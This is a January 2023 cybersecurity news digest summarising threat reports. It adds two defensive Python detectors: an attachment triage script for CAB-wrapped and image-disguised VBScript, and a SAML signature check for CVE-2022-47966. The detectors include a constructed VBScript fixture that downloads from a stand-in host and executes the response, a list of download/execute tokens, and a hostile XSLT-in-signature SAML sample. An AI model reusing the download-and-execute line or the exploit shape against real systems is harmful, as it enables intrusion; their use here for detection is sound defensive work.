Thursday, January 19, 2023 // (IG): BB // BSidesCharm // Coffee for Bob
Playful Taurus: a Chinese APT active against Iran
FROM THE MEDIA: Palo Alto Networks’ Unit 42 has published a report describing “Playful Taurus” (also known as APT15 or Vixen Panda), a Chinese threat actor known for cyberespionage campaigns against government and diplomatic entities around the world. In this case, Playful Taurus is targeting government entities in Iran with a new version of its Turian backdoor. The threat actor appears to have compromised the networks of at least four Iranian government organizations, including Iran’s Ministry of Foreign Affairs. The new version of the malware includes “some additional obfuscation and a modified network protocol.” The researchers conclude, “Playful Taurus continues to evolve their tactics and their tooling. Recent upgrades to the Turian backdoor and new C2 infrastructure suggest that these actors continue to see success during their cyber espionage campaigns.”
READ THE STORY: The Cyberwire
Bitzlato crypto exchange seized for ransomware, drugs money laundering
FROM THE MEDIA: The U.S. Department of Justice has arrested and charged Russian national Anatoly Legkodymov, founder of the Hong Kong-registered cryptocurrency exchange Bitzlato, with helping cybercriminals launder illegally obtained money. Legkodymov was arrested on Tuesday night in Miami and was expected to be arraigned in the U.S. District Court for the Southern District of Florida. French authorities also dismantled Bitzlato's digital infrastructure in an operation conducted with Europol and partners in Spain, Portugal, and Cyprus. To put the scale in perspective, a Chainalysis report on cryptocurrency-based money laundering found that Bitzlato received more than $2 billion worth of cryptocurrency between 2019 and 2021, of which more than $966 million (roughly 48% of the total) was illicit or risky.
READ THE STORY: BleepingComputer // Cyberscoop
Ukraine links data-wiping attack on news agency to Russian hackers
FROM THE MEDIA: The Computer Emergency Response Team of Ukraine (CERT-UA) has linked a destructive malware attack on the country's national news agency (Ukrinform) to the Sandworm Russian military hacking group. "According to preliminary data provided by CERT-UA specialists, the attack has caused certain destructive effects on the agency's information infrastructure, but the threat has been swiftly localized nonetheless," the State Service of Special Communications and Information Protection (SSSCIP) of Ukraine said. "This enabled Ukrinform to continue its operation. Right now, CERT-UA specialists are assisting in infrastructure recovery and continuing investigation of the incident." CERT-UA says the attack was likely carried out by Sandworm based on the tactics observed; the group has previously been linked to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
READ THE STORY: BleepingComputer
British and Ukrainian cyber officials meet in London for threat intelligence talks
FROM THE MEDIA: Senior cybersecurity officials from the United Kingdom and Ukraine met for several hours on Wednesday to discuss threat intelligence relating to Russian cyberattacks. The bilateral talks between National Cyber Security Centre (NCSC) staff and a delegation from Ukraine’s State Service of Special Communications and Information Protection (SSSCIP) and its Computer Emergency Response Team (CERT-UA) covered the latest developments in the conflict, although the substance of the meetings was not disclosed. While in London, the Ukrainian delegates also appeared at the CyberThreat conference to give a keynote speech discussing their response to attacks on the country’s critical infrastructure. As reported by The Record earlier this month, CERT-UA has attended to more than 80 critical cybersecurity incidents targeting the country’s energy sector since the beginning of the invasion — all while kinetic attacks caused by cruise missiles and drones have left much of the country without heating during the coldest months of the year.
READ THE STORY: The Record
Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa
FROM THE MEDIA: An ongoing campaign dubbed Earth Bogle is using geopolitically themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa. "The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT," Trend Micro said in a report published Wednesday. Phishing emails, typically tailored to the victim's interests, carry malicious attachments that start the infection routine: a Microsoft Cabinet (CAB) archive containing a Visual Basic Script dropper that deploys the next-stage payload. The files are also suspected to be distributed via social media platforms such as Facebook and Discord, with the attackers in some cases creating bogus accounts to serve ads on pages impersonating legitimate news outlets. The CAB files hosted on cloud storage masquerade as sensitive voice recordings to entice the victim into opening them; the embedded VBScript then runs and retrieves a second VBScript file that is disguised as an image file.
READ THE STORY: THN
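The Earth Bogle chain above relies on two cheap disguises: a CAB archive that wraps a script dropper, and a second-stage VBScript served under an image file name. Both can be caught at a mail or proxy gateway without detonating anything. The script below is an added example for this digest, not Trend Micro's code or anything from its report. It lists CAB members straight from the CFFILE table (Microsoft's published CFHEADER/CFFILE layout; no decompression), checks whether a file's claimed image type matches its magic bytes, and scans for download-and-execute tokens. The token list and image-magic table are heuristics chosen here, and the sample files are constructed stubs (a CAB with a file table but no data blocks, and a text-only stage-two script pointing at an `.invalid` host).

```python
import re
import struct

CAB_MAGIC = b"MSCF"
CFHEADER_LEN = 36          # fixed part of the CAB header
CFFILE_FIXED_LEN = 16      # CFFILE fields before the NUL-terminated name

# Script types Windows runs on double-click; a lure CAB usually holds one of these.
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")

# Magic bytes for the image types a decoy name tends to claim (assumption: extend as needed).
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Heuristic VBScript download/execute tokens, chosen for this example, not taken from the report.
VBS_TOKENS = re.compile(
    rb"(?i)\b(CreateObject|WScript\.Shell|MSXML2\.XMLHTTP|ADODB\.Stream|"
    rb"Scripting\.FileSystemObject|ExecuteGlobal|Execute)\b"
)


def list_cab_members(data: bytes) -> list:
    """Return member file names from a CAB's CFFILE table without decompressing anything."""
    if len(data) < CFHEADER_LEN or data[:4] != CAB_MAGIC:
        raise ValueError("not a Microsoft Cabinet file")
    coff_files = struct.unpack_from("<I", data, 16)[0]   # offset of the first CFFILE entry
    n_files = struct.unpack_from("<H", data, 28)[0]      # cFiles
    names, pos = [], coff_files
    for _ in range(n_files):
        if pos + CFFILE_FIXED_LEN > len(data):
            raise ValueError("truncated CFFILE table")
        end = data.index(b"\x00", pos + CFFILE_FIXED_LEN)
        names.append(data[pos + CFFILE_FIXED_LEN:end].decode("utf-8", "replace"))
        pos = end + 1
    return names


def triage_attachment(name: str, data: bytes) -> dict:
    """Flag the two disguises in the Earth Bogle chain: script-in-CAB and script-as-image."""
    findings = []
    lower = name.lower()
    ext = lower[lower.rfind("."):] if "." in lower else ""
    if data.startswith(CAB_MAGIC):
        scripts = [m for m in list_cab_members(data) if m.lower().endswith(SCRIPT_EXTS)]
        if scripts:
            findings.append("CAB carries script member(s): " + ", ".join(scripts))
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        findings.append(f"named {ext} but the content has no image signature")
    tokens = sorted({m.decode().lower() for m in VBS_TOKENS.findall(data[:65536])})
    if tokens:
        findings.append("VBScript download/execute tokens: " + ", ".join(tokens))
    return {"name": name, "suspicious": bool(findings), "findings": findings}


def build_stub_cab(member_names: list) -> bytes:
    """Constructed fixture: valid CFHEADER, one empty CFFOLDER, CFFILE entries, no CFDATA blocks."""
    folder = struct.pack("<IHH", 0, 0, 0)
    files = b"".join(
        struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 0x20) + n.encode() + b"\x00" for n in member_names
    )
    coff_files = CFHEADER_LEN + len(folder)
    header = struct.pack(
        "<4sIIIIIBBHHHHH",
        CAB_MAGIC, 0, coff_files + len(files), 0, coff_files, 0,
        3, 1,                   # versionMinor, versionMajor
        1, len(member_names),   # cFolders, cFiles
        0, 0, 0,                # flags, setID, iCabinet
    )
    return header + folder + files


# Constructed stage-two script of the kind a lure would serve under an image name.
STAGE2_AS_IMAGE = (
    b'Set sh = CreateObject("WScript.Shell")\r\n'
    b'Set http = CreateObject("MSXML2.XMLHTTP")\r\n'
    b'http.Open "GET", "http://example.invalid/next.jpg", False\r\n'
    b"http.Send\r\n"
    b"ExecuteGlobal http.responseText\r\n"
)

if __name__ == "__main__":
    samples = [
        ("voice_recording.cab", build_stub_cab(["voice_recording.wav.vbs"])),
        ("voice.jpg", STAGE2_AS_IMAGE),
        ("photo.png", IMAGE_MAGIC[".png"][0] + b"\x00" * 32),
    ]
    for sample_name, blob in samples:
        print(triage_attachment(sample_name, blob))
```

The CAB lister reads only the header and file table, so it is safe to run on untrusted archives and fast enough for inline inspection; a real gateway would still extract members for the usual AV and sandbox passes. The token scan is a triage signal, not a verdict: legitimate admin scripts use the same objects, so route hits to review rather than auto-block.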
Researchers Warn Against Zoho ManageEngine “Spray and Pray” Attacks
FROM THE MEDIA: Security researchers have issued a warning about a critical pre-authentication remote code execution (RCE) vulnerability, CVE-2022-47966, in Zoho ManageEngine products, including ServiceDesk Plus build 14003 and Endpoint Central version 10.1.2888.10. According to the researchers, an adversary can exploit the vulnerability if Security Assertion Markup Language (SAML) single sign-on is enabled or has ever been enabled on the product. The bug is being exploited in a "spray and pray" campaign, in which attackers target organizations indiscriminately and at scale in the hope that some of their many attempts succeed. Once an attacker has gained high-privilege code execution on an affected ManageEngine host, they can dump operating-system credentials from the Local Security Authority Subsystem Service (LSASS) process and use them to move laterally within the environment with existing public tools.
READ THE STORY: Security Boulevard
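The warning above says when CVE-2022-47966 is exploitable but not what a hostile request looks like. Public analyses attribute the bug to an outdated Apache Santuario XML Security library bundled with ManageEngine, which accepted an XSLT transform inside the signature of a SAML response posted to the product's SAML endpoint. The check below is an added example written for this digest, not code from Zoho, Security Boulevard or the quoted researchers, and it assumes that attribution: it inspects a SAMLResponse (raw XML or the base64 form carried in the POST parameter) and flags any ds:Transform that is not one of the standard SAML signature transforms, with XSLT called out specifically. The benign and hostile responses are constructed; the hostile one carries an empty stylesheet, since the shape, not the payload, is what a detector keys on.

```python
import base64
import xml.etree.ElementTree as ET

DSIG_NS = "http://www.w3.org/2000/09/xmldsig#"
XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
XSLT_TRANSFORM_ALG = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# Transform algorithms a normal SAML 2.0 signature uses. Anything else in a ds:Transform is
# unusual enough to alert on; XSLT in particular should never appear in a SAML response.
ALLOWED_TRANSFORM_ALGS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315#WithComments",
    "http://www.w3.org/2006/12/xml-c14n11",
}


def decode_saml_response(param: str) -> bytes:
    """Accept raw XML or the base64 text carried in a SAMLResponse form field."""
    text = param.strip()
    return text.encode() if text.startswith("<") else base64.b64decode(text)


def find_signature_anomalies(saml_response: str) -> list:
    """Return reasons the signature block looks hostile; an empty list means nothing unusual.

    The stdlib parser is used here for inspection only; a production gateway parsing
    attacker-controlled XML should use defusedxml or an equivalently hardened parser.
    """
    root = ET.fromstring(decode_saml_response(saml_response))
    reasons = []
    for transform in root.iter(f"{{{DSIG_NS}}}Transform"):
        alg = transform.get("Algorithm", "")
        if alg == XSLT_TRANSFORM_ALG:
            reasons.append("XSLT transform in ds:Transform (the CVE-2022-47966 vector)")
        elif alg not in ALLOWED_TRANSFORM_ALGS:
            reasons.append(f"unexpected transform algorithm: {alg or '<missing>'}")
    if any(el.tag.startswith(f"{{{XSLT_NS}}}") for el in root.iter()):
        reasons.append("xsl:* element embedded in the SAML response")
    return reasons


def as_post_param(xml_text: str) -> str:
    """Encode XML the way a browser posts it in the SAMLResponse parameter."""
    return base64.b64encode(xml_text.encode()).decode()


# Constructed fixtures: the same Response skeleton with benign and hostile transform lists.
_OPEN = (
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_resp1">'
    "<ds:Signature><ds:SignedInfo>"
    '<ds:Reference URI="#_resp1"><ds:Transforms>'
)
_CLOSE = "</ds:Transforms></ds:Reference></ds:SignedInfo></ds:Signature></samlp:Response>"

BENIGN_RESPONSE = (
    _OPEN
    + '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    + '<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    + _CLOSE
)

HOSTILE_RESPONSE = (
    _OPEN
    + '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    + f'<ds:Transform Algorithm="{XSLT_TRANSFORM_ALG}">'
    + f'<xsl:stylesheet xmlns:xsl="{XSLT_NS}" version="1.0"><xsl:template match="/"/></xsl:stylesheet>'
    + "</ds:Transform>"
    + _CLOSE
)

if __name__ == "__main__":
    for label, resp in (("benign", BENIGN_RESPONSE), ("hostile", as_post_param(HOSTILE_RESPONSE))):
        print(label, find_signature_anomalies(resp) or "clean")
```

Run this over captured POSTs to the ManageEngine SAML endpoint from proxy or WAF logs; any hit on a host where SAML was ever enabled is worth treating as an exploitation attempt and pivoting to the LSASS-access and lateral-movement telemetry the article describes. The allowlist approach also catches novel abuse of other transform types, which a single XSLT signature would miss.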
Thousands of Sophos firewalls still vulnerable out there to hijacking
FROM THE MEDIA: More than 4,000 public-facing Sophos firewalls remain vulnerable to a critical remote code execution bug disclosed last year, according to security researchers. The flaw, CVE-2022-3236, had already been exploited as a zero-day when Sophos published a security advisory about it in September 2022. At the time, the vendor said the hole had been abused to target "a small set of specific organizations, primarily in the South Asia region." The vulnerability can be exploited to gain control of a device, which can then be used to probe and attack the network behind it or outside targets. Sophos initially issued a hotfix for some firewall versions and then released a formal update that fixed the bug in December 2022.
READ THE STORY: The Register
Rise of cloud-delivered malware poses key security challenges
FROM THE MEDIA: As more organizations have turned to the cloud to store and work with their data, applications and other assets, cybercriminals are increasingly exploiting cloud-based services to set up malicious downloads. A new report from network security provider Netskope looks at the rise in cloud-delivered malware and provides tips on how to protect your organization from these threats. The shift to hybrid and remote work has led to a greater use of apps such as Microsoft OneDrive, SharePoint and Microsoft Teams, and there was a dramatic rise in the number of users uploading content to these and other cloud-based services in 2022: Last year, more than 25% of people around the world uploaded documents each day to Microsoft OneDrive, 7% to Google Drive and 5% to Microsoft SharePoint.
READ THE STORY: TechRepublic
The MarkdownTime Vulnerability: How to Avoid This DoS Attack on Business Critical Services
FROM THE MEDIA: Everybody is familiar with downtime in major services. It is frustrating when a platform your organization depends on becomes unavailable, and when that platform is a critical part of your software supply chain, downtime means your production pipeline stops and your entire software factory is down. The damage can be very expensive. Now imagine a bad actor finding a vulnerability that lets an unauthenticated user take down business-critical infrastructure with one line of input. In this article, we explore “MarkdownTime”, a vulnerability we found in a very popular markdown engine implementation, and the Denial-of-Service (DoS) attack it could enable against dependent projects such as GitHub and GitLab. Software supply chains can contain multiple looming threats and vulnerable dependencies, and when a popular library is vulnerable to an easy-to-exploit attack, millions of organizations can be exposed.
READ THE STORY: Security Boulevard
Thousands of Nissan customers affected by data breach through third-party vendor
FROM THE MEDIA: Nissan has sent breach notification letters to thousands of people to inform them of a leak of personal information through a third-party vendor. The car company said it was notified on June 21 that names, dates of birth, and account numbers for Nissan Motor Acceptance Corporation – an indirect lender that helps people finance or lease Nissan vehicles – were exposed after it provided the customer information to an unnamed third party “for software testing.” Nissan’s breach notification letter, which was sent to 17,998 people, does not say when the data was exposed or for how long. “During our investigation, on September 26, 2022, we determined that this incident likely resulted in unauthorized access or acquisition of our data, including some personal information belonging to Nissan customers.”
READ THE STORY: The Record
Illegal Solaris darknet market hijacked by competitor Kraken
FROM THE MEDIA: Solaris, a large darknet marketplace focused on drugs and other illegal substances, has been taken over by a smaller competitor named 'Kraken,' which claims to have hacked it on January 13, 2023. The Tor site of Solaris currently redirects to Kraken, and blockchain monitoring experts at Elliptic report no movement in the cryptocurrency addresses associated with the site after January 13, 2023. Solaris emerged a few months ago, following the seizure of Hydra, in an attempt to capture a portion of the then-disrupted market. The new market quickly captured about 25% of the market and processed roughly $150 million in illegal sales. At the start of the year, a Resecurity report on the emergence of new drug markets stated that Solaris had received 60,000 new registrations since Hydra's sudden demise, while Kraken had absorbed only about 10% of that.
READ THE STORY: BleepingComputer
Polish Cyber Defenses and the Russia-Ukraine War
FROM THE MEDIA: The crisis between NATO countries and Russia following Russia’s invasion of Ukraine has involved aggressive rhetoric, military warnings, sabotage of critical infrastructure, nuclear saber-rattling, and cyberattacks. Experts have warned that international crises are a fertile ground for cyber escalation, including the current conflict in Ukraine. Outside of Ukraine, Poland has been a major target of Russian cyberattacks, both for espionage and disruptive purposes. Poland needs to prepare for a potential Russian escalation in cyberspace by increasing its collaboration with international partners and its cyber defense readiness.
READ THE STORY: CFR
Strengthening cyber resilience in the oil and gas industry
FROM THE MEDIA: The oil and gas industry uses a range of complex systems and interconnected technologies to extract, transport and refine oil and gas products. While these technologies are necessary to support the delivery of energy services and products, they are increasingly vulnerable to cyberattacks, making cybersecurity critical to collective resilience. The World Economic Forum's Centre for Cybersecurity launched the Cyber Resilience in Oil and Gas initiative in 2020 as part of its efforts to strengthen cybersecurity across multiple industries. The initiative comprises a community of over 40 public and private organizations working together to drive forward collective action on cyber resilience. One of the community's key initiatives is the Cyber Resilience Pledge.
READ THE STORY: World Economic Forum
Pro-Russian hackers say they breached Samsung
FROM THE MEDIA: Genesis Day, a pro-Russian hacktivist group, claims to have breached Samsung’s internal servers over South Korea’s cooperation with NATO. The attackers posted an ad on a popular hacking forum alleging that they had breached the South Korean manufacturing conglomerate. The group claims to have found its way into an internal FTP service used by Samsung Group in South Korea. “Because South Korea has recently strengthened its cooperation with NATO and targeted other countries, we hacked into the internal FTP service of the Samsung Group in South Korea,” the attackers said. Sample data examined by the Cybernews research team allegedly includes Samsung corporate manuals for logging in, an employee password, and several educational videos. However, the sample does not appear to contain sensitive data.
READ THE STORY: Cybernews
Law enforcement takes down crypto exchange allegedly used to launder $15 million in ransomware payments
FROM THE MEDIA: The Russian co-founder of a cryptocurrency exchange allegedly used to launder cybercrime proceeds was arrested early Wednesday morning in Miami, the Department of Justice announced. The arrest of Anatoly Legkodymov, who is charged with “unlicensed money transmitting,” is “a significant blow to the cryptocrime ecosystem,” Deputy Attorney General Lisa Monaco said. The exchange, Bitzlato, is based in China and registered in Hong Kong, and Legkodymov is described by the DOJ as a resident of Shenzhen. Legkodymov’s arrest coincided with an international operation against the exchange, including the seizure of its servers. French authorities, alongside Europol and partners in Spain, Portugal, and Cyprus, “dismantled Bitzlato’s digital infrastructure,” the DOJ announcement said. The operation was the first enforcement action led by the National Cryptocurrency Enforcement Team, which was announced in October 2021.
READ THE STORY: The Record
Nozomi Networks Researchers Take a Deep Look into the ICS Threat Landscape
FROM THE MEDIA: Monitoring the constantly-evolving cyber threat landscape is essential in staying up-to-date on the latest threats and potential attack vectors. This allows organizations to anticipate vulnerabilities, proactively harden their systems, and implement countermeasures that can protect against malicious actors. By understanding how their networks may be susceptible to attack, organizations can take action to reduce the likelihood of a successful breach. In the past six months, Nozomi Networks researchers have seen an increase in the number and severity of cyberattacks, disrupting businesses and critical infrastructure around the globe. Railways have been particularly targeted by attackers, necessitating increased protective protocols for rail operators.
READ THE STORY: Security Boulevard
Exploiting CVE-2021-3490 for Container Escapes
FROM THE MEDIA: Today, containers are the preferred approach to deploy software or create build environments in CI/CD lifecycles. However, since the emergence of container solutions and environments like Docker and Kubernetes, security researchers have consistently found ways to escape from containers once they are compromised. Most attacks are based on configuration errors. But it is also possible to escalate privileges and escape to the container’s host system by exploiting vulnerabilities in the host’s operating system. This blog shows how to modify an existing Linux kernel exploit in order to use it for container escapes and how the CrowdStrike Falcon® platform can help to prevent and hunt for similar threats.
READ THE STORY: CrowdStrike
1000 Shipping Vessels Impacted by Ransomware Attack
FROM THE MEDIA: Around 1000 shipping vessels have been impacted by a ransomware attack, a software management company has revealed. DNV, a Norwegian software supplier that provides services for 12,000 ships and mobile offshore units across the globe, said its ShipManager software had been hit by the attack on January 7, 2023. Consequently, around 70 customers operating roughly 1000 vessels have been impacted. These customers “have been advised to consider relevant mitigating measures depending on the types of data they have uploaded to the system.” DNV added that it had informed the impacted parties about their responsibility to notify the relevant data protection authorities in their countries of the incident. However, the firm said “there are no indications that any other data or servers by DNV are affected,” and the server outage has not impacted any of its other services.
READ THE STORY: InfoSecMag
Deep Fakes may replicate digital humans this year
FROM THE MEDIA: When we have a reactive attitude we become extremely vulnerable to digital threats, which puts our businesses and our societies at risk of attackers who are always evolving and looking for ways to gain access. Ransomware, for example, continues to adapt with different enhancements and tactics, and we must always be dynamic and flexible to change. Yet, while some things change others stay constant. Data privacy and security continue to be a top priority. In the new working environment, our homes are becoming an extension of the office. And with continuing cloud adoption, there is a massive expansion of the threatscape. A year ago I made several predictions about topics including Cyberwars, Ransomware, Hacker Esports, Privileged Identity and Zero Trust. Several of them turned out to be fairly accurate, with lessons to be learned moving forward.
READ THE STORY: iTWire
ChatGPT Could Create Polymorphic Malware Wave, Researchers Warn
FROM THE MEDIA: The newly released ChatGPT artificial intelligence bot from OpenAI could be used to usher in a dangerous new wave of polymorphic malware, security researchers warn. One of the many tricks ChatGPT has been able to pull off is writing highly advanced malware that contains no malicious code at rest at all, making it difficult to detect and mitigate, researchers at CyberArk explained in their recent threat research report. The CyberArk team also detailed how the chatbot can be used both to generate injection code and to mutate it. This new wave of cheap and easy ChatGPT-driven polymorphic malware is something cybersecurity professionals should pay attention to, the analysis added. "As we have seen, the use of ChatGPT's API within malware can present significant challenges for security professionals," the report said. "It's important to remember, this is not just a hypothetical scenario but a very real concern."
READ THE STORY: DarkReading
ICS Confronted by Attackers Armed With New Motives, Tactics, and Malware
FROM THE MEDIA: The motive of financial and political gain — fueled partially by the ongoing conflict in Ukraine — has emboldened threat actors to barrage industrial control systems (ICS) with ever more disruptive cyberattacks, diversifying the threat landscape for critical infrastructure, new research shows. This trend is expected to continue throughout 2023 with attackers arming themselves with new tactics and malware, forcing ICS operators to level up if they want to protect their networks, according to Nozomi Networks' "OT/IoT Security Report: A Deep Look Into the ICS Threat Landscape" for the second half of 2022, published Jan. 18.
READ THE STORY: DarkReading
New York man defrauded thousands using credit cards sold on dark web
FROM THE MEDIA: A New York resident has pleaded guilty to conspiracy to commit bank fraud using stolen credit cards purchased on dark web cybercrime marketplaces. Trevor Osagie, a 31-year-old man from the Bronx, admitted to playing a key role in a credit card fraud conspiracy that caused over $1,500,000 in losses to 4,000 account holders. Osagie committed the crimes between 2015 and 2018 with a network of co-conspirators in New Jersey and New York, who used various methods to launder their proceeds. The defendant now faces up to 30 years in prison and a maximum fine of $1,000,000; sentencing is scheduled for May 25, 2023. According to the indictment cited in the U.S. Department of Justice announcement, Osagie purchased data for thousands of credit and debit cards from dark web markets.
READ THE STORY: BleepingComputer
Avast Releases Free Decryptor for BianLian Ransomware
FROM THE MEDIA: The BianLian ransomware group targets organizations around the world, with a prime focus on Australia, the United States, and the United Kingdom. Analysts at cybersecurity firm Avast have released a decryptor for BianLian, which first surfaced in August 2022. Using it, BianLian victims can recover their encrypted data for free instead of paying the attackers. Most BianLian victims were in the healthcare, energy, media, and manufacturing sectors. According to Avast’s analysis, the malware is written in Go, which improves its operational capabilities and makes it harder to detect. One distinctive feature of BianLian is its use of concurrency, which lets it encrypt data quickly.
READ THE STORY: HackRead
Items of interest
A Comprehensive Guide to IoT Security
FROM THE MEDIA: The Internet of Things, also known as IoT, is a system of interconnected computing devices, mechanical machines, or objects with sensors and software that can transfer or exchange information over a network with no human intervention. IoT security refers to the processes and technologies put in place to prevent or mitigate cyber risks for these devices. The definition of what constitutes an IoT device varies widely and includes everything from biomedical implants to sensors on manufacturing and electrical equipment. An IoT ecosystem can encompass many different smart devices that collect, send and act on data from their environments. Sometimes, these devices even communicate with each other and act on the information they get from one another.
READ THE STORY: Security Boulevard
IoT Hacking—A Practical Guide (Video)
FROM THE MEDIA: In this '401 Access Denied' podcast, authors of "Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things," Beau Woods and Paulino Calderon join us. As we become more connected, how can we improve IoT security and safety?
ChatGPT will make you better (Video)
FROM THE MEDIA: ChatGPT took the world by storm on its release in December 2022, and for good reason: it’s an AI that could potentially take all of our jobs! While that could eventually be true, I’m choosing to take advantage of it and use it to make me better! In this video, I’ll show you the power of ChatGPT and how you can use it as an IT professional, hacker, network engineer, or cloud engineer to make you look awesome!
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com